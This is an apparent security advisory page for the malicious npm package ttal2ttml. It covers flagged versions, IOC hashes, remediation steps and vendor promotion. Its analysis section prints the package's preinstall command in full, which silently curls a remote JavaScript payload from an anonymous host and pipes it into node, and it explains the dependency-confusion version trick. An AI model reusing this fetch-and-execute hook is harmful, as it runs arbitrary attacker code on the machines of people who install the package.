Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

ttal2ttmlnpm

Malicious code in ttal2ttml (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-6298
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall ttal2ttml

What this malware does

package.json declares a preinstall lifecycle script that runs node -e "try{require('child_process').execSync('curl -sf https://d1ugk469z93e.0ac.io/callback.js | node',{stdio:'ignore'})}catch(e){}". On every npm install, the package fetches an unpinned JavaScript payload from the anonymous subdomain d1ugk469z93e.0ac.io and pipes it into node, executing whatever bytes the host returns under the installer's user account. Errors are swallowed via try/catch and stdio:'ignore' to hide failures. The destination is not the publisher's domain and the package's nominal purpose (TTML conversion) requires no network access. The package is also published at an artificially elevated version (99.0.3) with an empty index.js that self-describes as a dependency-confusion research PoC — the canonical shape used to win resolution against a private internal package of the same name. Regardless of stated intent, the remote-exec payload runs on every installer.

Malicious versions

4 flagged
1.0.499.0.199.0.299.0.3

Indicators of compromise (SHA-256)

281c5569265aa0093b3578ffebd476c0ad1e6bb42e90f5fc2fe1fcbf4643bfe1
29387ac35a2248ad2e4b287b8c082f8d1a8d03b4937fc84a5b81fb85697e19d4
2d1803d586219b8e414fc8e880ee05cf3d5b34427df51f8a42847b769dd3f2cf
af36f2b2617af9508212a148c62d8eee99fd0236d2bc4368bfa2d00ce1b52486

Detection & response playbook

Malicious package
  1. Find it

    Scan your lockfiles (package-lock.json, pnpm-lock.yaml, yarn.lock, requirements.txt, poetry.lock, etc.) and build artifacts for ttal2ttml (4 malicious versions). O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, flagging ttal2ttml across your stack and pipelines.

  2. If you installed it — respond

    Remove ttal2ttml from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound activity or persistence.

  3. Did it already run?

    If ttal2ttml was ever installed, its post-install/runtime payload may have already executed. O3's L7 egress monitoring and runtime eBPF sensors detect the credential exfiltration or command-and-control callback after install and block the malicious outbound channel, so you catch and contain the actual compromise — not just the presence of the package.

  4. How O3 protects you

    O3 blocks ttal2ttml before install through its supply-chain scanner, and if it has already run, detects and severs the exfiltration or C2 callback at runtime through L7 egress monitoring and eBPF.

Frequently asked questions

No. ttal2ttml on npm has been identified as a malicious package (versions 1.0.4, 99.0.1, 99.0.2, 99.0.3 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-007202IN-MAL-2026-007203IN-MAL-2026-007204IN-MAL-2026-007338

References

Credits

  • Amazon Inspector · finder

Detect & block this

O3 blocks ttal2ttml-class packages before install and in CI — and if it already ran, its runtime egress monitoring catches the malicious outbound activity and severs the channel.